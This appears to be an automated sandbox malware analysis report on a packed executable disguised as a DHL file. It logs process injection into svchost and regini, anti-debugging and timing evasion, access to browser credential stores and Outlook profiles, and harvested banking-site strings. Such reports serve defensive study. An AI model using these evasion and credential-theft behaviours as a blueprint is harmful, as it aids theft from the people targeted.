                Source: regini.exe, 00000006.00000002.4815970575.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2951763766.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2951888170.0000000002B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL_734825510.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\DHL_734825510.exe "C:\Users\user\Desktop\DHL_734825510.exe"
                Source: C:\Users\user\Desktop\DHL_734825510.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_734825510.exe"
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL_734825510.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_734825510.exe"Jump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RsbLJIqaDYs.exe, 00000005.00000002.4816396248.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4816788031.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: regini.pdb source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414774 push esp; retf 1CE7h2_2_0041478E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402029 push FFFFFFFBh; retf 2_2_00402032
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A991 push ebp; iretd 2_2_0041A992
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403230 push eax; ret 2_2_00403232
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411AD3 push edi; retf 2_2_00411AD4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182B7 pushad ; iretd 2_2_004182B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D346 push ds; iretd 2_2_0040D347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412468 pushad ; iretd 2_2_0041247F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418CCC push esp; retn 55EDh2_2_00418CD1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412484 push 0000003Bh; retf 2_2_00412486
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040855D push es; ret 2_2_00408560
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D33 pushad ; retf 2_2_00418D85
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F3C push edi; ret 2_2_00417F57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404FF0 push esi; ret 2_2_00404FF1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030309AD push ecx; mov dword ptr [esp], ecx6_2_030309B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BF235 pushad ; iretd 6_2_028BF24C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BF251 push 0000003Bh; retf 6_2_028BF253
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028B532A push es; ret 6_2_028B532D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C5084 pushad ; iretd 6_2_028C5085
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C775E push ebp; iretd 6_2_028C775F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BE8A0 push edi; retf 6_2_028BE8A1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028B1DBD push esi; ret 6_2_028B1DBE
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C4D09 push edi; ret 6_2_028C4D24
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EE61EE push ecx; ret 6_2_02EE61F1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EE51CA push edi; ret 6_2_02EE51CB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EE46FA push F89E7CD4h; iretd 6_2_02EE46FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EE7490 push esi; ret 6_2_02EE74AD
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEF491 push esi; retf 6_2_02EEF496
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EE75D0 push 2BEAA342h; iretd 6_2_02EE75DC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EE0B07 push ss; ret 6_2_02EE0B08
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: C:\Users\user\Desktop\DHL_734825510.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\DHL_734825510.exeAPI/Special instruction interceptor: Address: E3BEFC
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E30154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFEA3E2DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD1C0 rdtsc 2_2_03AAD1C0
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 9839Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\regini.exeAPI coverage: 3.1 %
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952Thread sleep count: 134 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952Thread sleep time: -268000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952Thread sleep count: 9839 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952Thread sleep time: -19678000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028CC7B0 FindFirstFileW,FindNextFileW,FindClose,6_2_028CC7B0
                Source: 174EBI30.6.drBinary or memory string: interactivebrokers.comVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: outlook.office.comVMware20,11696508427s
                Source: 174EBI30.6.drBinary or memory string: discord.comVMware20,11696508427f
                Source: 174EBI30.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: 174EBI30.6.drBinary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: 174EBI30.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: 174EBI30.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: 174EBI30.6.drBinary or memory string: outlook.office365.comVMware20,11696508427t
                Source: DHL_734825510.exe, 00000000.00000003.2350194950.0000000000F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe1n-6
                Source: 174EBI30.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: RsbLJIqaDYs.exe, 00000007.00000002.4816532169.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                Source: 174EBI30.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: 174EBI30.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: 174EBI30.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3063507738.0000013B9828C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 174EBI30.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: 174EBI30.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: 174EBI30.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: 174EBI30.6.drBinary or memory string: tasks.office.comVMware20,11696508427o
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: 174EBI30.6.drBinary or memory string: global block list test formVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: dev.azure.comVMware20,11696508427j
                Source: 174EBI30.6.drBinary or memory string: bankofamerica.comVMware20,11696508427x
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: 174EBI30.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: 174EBI30.6.drBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: 174EBI30.6.drBinary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD1C0 rdtsc 2_2_03AAD1C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417913 LdrLoadDll,2_2_00417913
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A533A5 mov eax, dword ptr fs:[00000030h]2_2_03A533A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h]2_2_03A633A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h]2_2_03A633A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0539D mov eax, dword ptr fs:[00000030h]2_2_03B0539D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h]2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h]2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF3E6 mov eax, dword ptr fs:[00000030h]2_2_03AEF3E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B053FC mov eax, dword ptr fs:[00000030h]2_2_03B053FC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h]2_2_03AEB3D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h]2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h]2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F32A mov eax, dword ptr fs:[00000030h]2_2_03A5F32A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A27330 mov eax, dword ptr fs:[00000030h]2_2_03A27330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF367 mov eax, dword ptr fs:[00000030h]2_2_03AEF367
